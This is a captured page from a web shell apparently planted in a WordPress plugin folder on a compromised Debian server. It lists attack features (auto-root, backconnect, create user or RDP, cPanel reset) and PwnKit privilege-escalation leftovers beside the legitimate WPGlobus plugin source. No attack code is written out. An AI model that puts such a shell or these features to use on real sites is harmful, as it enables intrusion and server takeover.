Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.188.75
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ilpnowa /
web /
wp-content /
plugins /
wpglobus /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
configs
[ DIR ]
drwxrwxr-x
flags
[ DIR ]
drwxrwxr-x
includes
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
language-switcher-sample.php
1.04
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
16.37
KB
-rw-r--r--
style-samples.css
2.33
KB
-rw-r--r--
styles-samples-widget.css
759
B
-rw-r--r--
uninstall.php
477
B
-rw-r--r--
wpglobus.php
6.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wpglobus.php
<?php /** * File: wpglobus.php * * @package WPGlobus * @author TIV.NET INC, Alex Gor (alexgff) and Gregory Karpinsky (tivnet) * @copyright 2015-2018 TIV.NET INC. / WPGlobus * @license http://www.gnu.org/licenses/gpl.txt GNU General Public License, version 3 */ // <editor-fold desc="WordPress plugin header"> /** * Plugin Name: WPGlobus * Plugin URI: https://github.com/WPGlobus/WPGlobus * Description: A WordPress Globalization / Multilingual Plugin. Posts, pages, menus, widgets and even custom fields - in multiple languages! * Text Domain: wpglobus * Domain Path: /languages/ * Version: 2.2.10 * Author: WPGlobus * Author URI: https://wpglobus.com/ * Network: false * License: GPL-3.0-or-later * License URI: https://spdx.org/licenses/GPL-3.0-or-later.html */ // </editor-fold> // <editor-fold desc="GNU Clause"> /** * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License, version 3, as * published by the Free Software Foundation. * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ // </editor-fold> // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) { exit; } define( 'WPGLOBUS_VERSION', '2.2.10' ); define( 'WPGLOBUS_PLUGIN_BASENAME', plugin_basename( __FILE__ ) ); /** * WP Requirements library. * * @since 1.6.4 */ if ( is_readable( dirname( __FILE__ ) . '/vendor/bemailr/wp-requirements/wpr-loader.php' ) ) { require_once dirname( __FILE__ ) . '/vendor/bemailr/wp-requirements/wpr-loader.php'; } /** @todo Get rid of these */ // @codingStandardsIgnoreStart global $WPGlobus; global $WPGlobus_Options; // @codingStandardsIgnoreEnd /** * Compatibility functions. * * @since 1.6.4 */ require_once dirname( __FILE__ ) . '/includes/compat/mbstring.php'; /** * Abstract class for plugins. * * @since 1.6.1 */ require_once dirname( __FILE__ ) . '/includes/class-wpglobus-plugin.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus-config.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus-utils.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus-wp.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus-widget.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus.php'; require_once dirname( __FILE__ ) . '/includes/class-wpglobus-core.php'; /** * Admin page helpers. * * @since 1.6.5 */ require_once dirname( __FILE__ ) . '/includes/admin/class-wpglobus-admin-page.php'; /** * Initialize * * @todo Rename uppercase variables. */ // @codingStandardsIgnoreStart WPGlobus::$PLUGIN_DIR_PATH = plugin_dir_path( __FILE__ ); WPGlobus::$PLUGIN_DIR_URL = plugin_dir_url( __FILE__ ); // @codingStandardsIgnoreEnd WPGlobus::Config(); require_once dirname( __FILE__ ) . '/includes/class-wpglobus-filters.php'; require_once dirname( __FILE__ ) . '/includes/wpglobus-controller.php'; /** * Support for Yoast SEO */ require_once dirname( __FILE__ ) . '/includes/wpglobus-yoastseo.php'; /** * Support of theme option panels and customizer * * @since 1.4.0 */ require_once dirname( __FILE__ ) . '/includes/admin/customize/wpglobus-customize.php'; /** * To disable WPGlobus Customizer Options, put this to wp-config: * define( 'WPGLOBUS_CUSTOMIZE', false ) * * @since 1.8.6 */ if ( ! defined( 'WPGLOBUS_CUSTOMIZE' ) || WPGLOBUS_CUSTOMIZE ) { /** * WPGlobus customize options * * @since 1.4.6 */ require_once dirname( __FILE__ ) . '/includes/admin/class-wpglobus-customize-options.php'; WPGlobus_Customize_Options::controller(); } // TODO remove this old updater. //require_once dirname( __FILE__ ) . '/updater/class-wpglobus-updater.php'; /** * TIVWP Updater. * * @since 1.5.9 */ if ( version_compare( PHP_VERSION, '5.3.0', '>=' ) && file_exists( dirname( __FILE__ ) . '/vendor/tivwp/updater/updater.php' ) ) { require_once dirname( __FILE__ ) . '/vendor/tivwp/updater/updater.php'; } /** * WPGlobus Post Types * * @since 1.9.10 */ require_once dirname( __FILE__ ) . '/includes/class-wpglobus-post-types.php'; /** * In admin area */ if ( WPGlobus_WP::in_wp_admin() ) : /** * HelpDesk * * @since 1.6.5 */ require_once dirname( __FILE__ ) . '/includes/admin/helpdesk/class-wpglobus-admin-helpdesk.php'; WPGlobus_Admin_HelpDesk::construct(); /** * WPGlobus Admin. * * @since 1.8.1 */ require_once dirname( __FILE__ ) . '/includes/admin/wpglobus-admin.php'; /** * WPGlobus News admin dashboard widget. * * @since 1.7.7 */ require_once dirname( __FILE__ ) . '/includes/admin/class-wpglobus-dashboard-news.php'; new WPGlobus_Dashboard_News(); /** * WPGlobus News admin dashboard widget. * * @since 1.7.8 */ require_once dirname( __FILE__ ) . '/includes/admin/class-wpglobus-admin-menu.php'; WPGlobus_Admin_Menu::construct(); /** * WPGlobus Recommendations. * To disable recommendations, put this to wp-config: * define( 'WPGLOBUS_RECOMMENDATIONS', false ); * * @since 1.8.7 */ if ( ! defined( 'WPGLOBUS_RECOMMENDATIONS' ) || WPGLOBUS_RECOMMENDATIONS ) { require_once dirname( __FILE__ ) . '/includes/admin/recommendations/class-wpglobus-admin-recommendations.php'; WPGlobus_Admin_Recommendations::setup_hooks(); } endif; /** * At the front */ if ( ! is_admin() && ! WPGlobus_WP::is_doing_ajax() ) : /** * First-time automatic redirect to the primary language specified in the browser. * * @since 1.8.0 */ /* @noinspection NestedPositiveIfStatementsInspection */ if ( isset( WPGlobus::Config()->browser_redirect['redirect_by_language'] ) && WPGlobus::Config()->browser_redirect['redirect_by_language'] ) { require_once dirname( __FILE__ ) . '/includes/class-wpglobus-redirect.php'; WPGlobus_Redirect::construct(); } endif;
Close